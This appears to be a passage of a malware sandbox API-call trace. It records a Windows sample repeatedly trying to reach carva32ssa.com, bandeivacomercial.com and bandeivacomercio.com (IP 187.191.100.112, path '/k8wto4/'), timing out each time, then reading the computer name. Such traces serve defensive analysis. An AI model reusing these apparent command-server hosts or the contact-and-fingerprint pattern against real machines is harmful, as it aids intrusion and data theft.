CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0156.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="carva32ssa.com", cchCount2=14) returned 3 [0156.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0156.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68feabd, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0156.272] socket (af=2, type=1, protocol=0) returned 0x944 [0156.272] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68feb84, optlen=0x68feb80 | out: optval="\x01", optlen=0x68feb80) returned 0 [0156.272] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68feb84, optlen=0x68feb80 | out: optval="", optlen=0x68feb80) returned 0 [0156.272] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0156.272] htons (hostshort=0x0) returned 0x0 [0156.273] bind (s=0x944, addr=0x68feae4*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0156.273] getsockname (in: s=0x944, name=0x68fead8, namelen=0x68feb58 | out: name=0x68fead8*(sa_family=2, sin_port=0xc00d, sin_addr="0.0.0.0"), namelen=0x68feb58) returned 0 [0156.273] htons (hostshort=0xdc0) returned 0xc00d [0156.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carva32ssa.com", cchCount1=14, lpString2="LOCALHOST", cchCount2=9) returned 1 [0156.273] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 14 [0156.273] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carva32ssa.com", cchUnicodeChar=14, lpASCIICharStr=0x71e6f9c, cchASCIIChar=14 | out: lpASCIICharStr="carva32ssa.com") returned 14 [0156.273] GetAddrInfoW (in: pNodeName="carva32ssa.com", pServiceName=0x0, pHints=0x68feb8c, ppResult=0x68febac | out: ppResult=0x68febac) returned 0 [0157.292] FreeAddrInfoW (pAddrInfo=0x300abf0) [0157.292] htons (hostshort=0x50) returned 0x5000 [0157.292] connect (s=0x944, name=0x68feb3c*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0178.327] WSAGetLastError () returned 10060 [0178.327] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fca68, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0178.327] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fca64, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0178.327] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68feacc) [0178.328] RtlUnwind (TargetFrame=0x68fec18, TargetIp=0x6ba8130, ExceptionRecord=0x68fe5ec, ReturnValue=0x0) [0178.329] shutdown (s=0x944, how=1) returned -1 [0178.329] closesocket (s=0x944) returned 0 [0178.329] GetCurrentThreadId () returned 0xc04 [0178.329] GetCurrentThreadId () returned 0xc04 [0178.330] GetCurrentThreadId () returned 0xc04 [0178.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fe345, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0178.330] GetCurrentThreadId () returned 0xc04 [0178.330] GetCurrentThreadId () returned 0xc04 [0178.330] GetCurrentThreadId () returned 0xc04 [0178.332] RtlUnwind (TargetFrame=0x68fed94, TargetIp=0x6ba8130, ExceptionRecord=0x68fe5ec, ReturnValue=0x0) [0178.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.334] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0178.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carva32ssa.com", cchCount1=14, lpString2="bandeivacomercial.com", cchCount2=21) returned 3 [0178.337] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0178.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fe1fd, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0178.337] socket (af=2, type=1, protocol=0) returned 0x944 [0178.338] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68fe2c4, optlen=0x68fe2c0 | out: optval="\x01", optlen=0x68fe2c0) returned 0 [0178.338] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68fe2c4, optlen=0x68fe2c0 | out: optval="", optlen=0x68fe2c0) returned 0 [0178.338] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0178.338] htons (hostshort=0x0) returned 0x0 [0178.338] bind (s=0x944, addr=0x68fe224*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0178.339] getsockname (in: s=0x944, name=0x68fe218, namelen=0x68fe298 | out: name=0x68fe218*(sa_family=2, sin_port=0xc00e, sin_addr="0.0.0.0"), namelen=0x68fe298) returned 0 [0178.339] htons (hostshort=0xec0) returned 0xc00e [0178.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercial.com", cchCount1=21, lpString2="LOCALHOST", cchCount2=9) returned 1 [0178.339] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercial.com", cchUnicodeChar=21, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 21 [0178.339] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercial.com", cchUnicodeChar=21, lpASCIICharStr=0x7211f3c, cchASCIIChar=21 | out: lpASCIICharStr="bandeivacomercial.com") returned 21 [0178.339] GetAddrInfoW (in: pNodeName="bandeivacomercial.com", pServiceName=0x0, pHints=0x68fe2cc, ppResult=0x68fe2ec | out: ppResult=0x68fe2ec) returned 0 [0178.346] FreeAddrInfoW (pAddrInfo=0x300abf0) [0178.346] htons (hostshort=0x50) returned 0x5000 [0178.346] connect (s=0x944, name=0x68fe27c*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0199.361] WSAGetLastError () returned 10060 [0199.361] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fc1a8, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0199.361] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fc1a4, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0199.361] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68fe20c) [0199.362] RtlUnwind (TargetFrame=0x68fe358, TargetIp=0x6ba8130, ExceptionRecord=0x68fdd2c, ReturnValue=0x0) [0199.362] shutdown (s=0x944, how=1) returned -1 [0199.362] closesocket (s=0x944) returned 0 [0199.363] GetCurrentThreadId () returned 0xc04 [0199.363] GetCurrentThreadId () returned 0xc04 [0199.363] GetCurrentThreadId () returned 0xc04 [0199.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fda85, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0199.363] GetCurrentThreadId () returned 0xc04 [0199.363] GetCurrentThreadId () returned 0xc04 [0199.363] GetCurrentThreadId () returned 0xc04 [0199.364] RtlUnwind (TargetFrame=0x68fe4d4, TargetIp=0x6ba8130, ExceptionRecord=0x68fdd2c, ReturnValue=0x0) [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercial.com", cchCount1=21, lpString2="bandeivacomercio.com", cchCount2=20) returned 1 [0199.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0199.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fd93d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0199.368] socket (af=2, type=1, protocol=0) returned 0x944 [0199.368] getsockopt (in: s=0x944, level=65535, optname=4104, optval=0x68fda04, optlen=0x68fda00 | out: optval="\x01", optlen=0x68fda00) returned 0 [0199.368] getsockopt (in: s=0x944, level=6, optname=1, optval=0x68fda04, optlen=0x68fda00 | out: optval="", optlen=0x68fda00) returned 0 [0199.368] setsockopt (s=0x944, level=65535, optname=4, optval="", optlen=4) returned 0 [0199.368] htons (hostshort=0x0) returned 0x0 [0199.368] bind (s=0x944, addr=0x68fd964*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0199.369] getsockname (in: s=0x944, name=0x68fd958, namelen=0x68fd9d8 | out: name=0x68fd958*(sa_family=2, sin_port=0xc00f, sin_addr="0.0.0.0"), namelen=0x68fd9d8) returned 0 [0199.369] htons (hostshort=0xfc0) returned 0xc00f [0199.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bandeivacomercio.com", cchCount1=20, lpString2="LOCALHOST", cchCount2=9) returned 1 [0199.369] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercio.com", cchUnicodeChar=20, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 20 [0199.369] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="bandeivacomercio.com", cchUnicodeChar=20, lpASCIICharStr=0x7211f7c, cchASCIIChar=20 | out: lpASCIICharStr="bandeivacomercio.com") returned 20 [0199.369] GetAddrInfoW (in: pNodeName="bandeivacomercio.com", pServiceName=0x0, pHints=0x68fda0c, ppResult=0x68fda2c | out: ppResult=0x68fda2c) returned 0 [0200.383] FreeAddrInfoW (pAddrInfo=0x300abf0) [0200.383] htons (hostshort=0x50) returned 0x5000 [0200.383] connect (s=0x944, name=0x68fd9bc*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) returned -1 [0221.404] WSAGetLastError () returned 10060 [0221.404] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeaa, lpBuffer=0x68fb8e8, cchBufferMax=4096 | out: lpBuffer="Connection timed out.") returned 0x15 [0221.404] LoadStringW (in: hInstance=0x6ba0000, uID=0xfeca, lpBuffer=0x68fb8e4, cchBufferMax=4096 | out: lpBuffer="Socket Error # %d\r\n%s") returned 0x15 [0221.404] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68fd94c) [0221.405] RtlUnwind (TargetFrame=0x68fda98, TargetIp=0x6ba8130, ExceptionRecord=0x68fd46c, ReturnValue=0x0) [0221.406] shutdown (s=0x944, how=1) returned -1 [0221.406] closesocket (s=0x944) returned 0 [0221.407] GetCurrentThreadId () returned 0xc04 [0221.407] GetCurrentThreadId () returned 0xc04 [0221.407] GetCurrentThreadId () returned 0xc04 [0221.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68fd1c5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0221.407] GetCurrentThreadId () returned 0xc04 [0221.407] GetCurrentThreadId () returned 0xc04 [0221.407] GetCurrentThreadId () returned 0xc04 [0221.409] RtlUnwind (TargetFrame=0x68fdc14, TargetIp=0x6ba8130, ExceptionRecord=0x68fd46c, ReturnValue=0x0) [0221.411] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0221.411] IsWindowUnicode (hWnd=0x1015c) returned 1 [0221.411] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0221.411] GetCapture () returned 0x0 [0221.411] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0221.411] GetCurrentProcessId () returned 0x4f0 [0221.411] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0221.412] GetPropW (hWnd=0x1015c, lpString=0xc031) returned 0x0 [0221.412] GetParent (hWnd=0x1015c) returned 0x0 [0221.412] TranslateMessage (lpMsg=0x68ff884) returned 0 [0221.412] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0221.412] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0221.412] GetComputerNameW (in: lpBuffer=0x71e04bc, nSize=0x68ff4c0 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff4c0) returned 1 [0221.412] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671579353) returned 1 [0221.412] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671579820) returned 1 [0221.413] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671579946) returned 1 [0221.413] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671580061) returned 1 [0221.413] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671580449) returned 1 [0221.413] QueryPerformanceCounter (in: 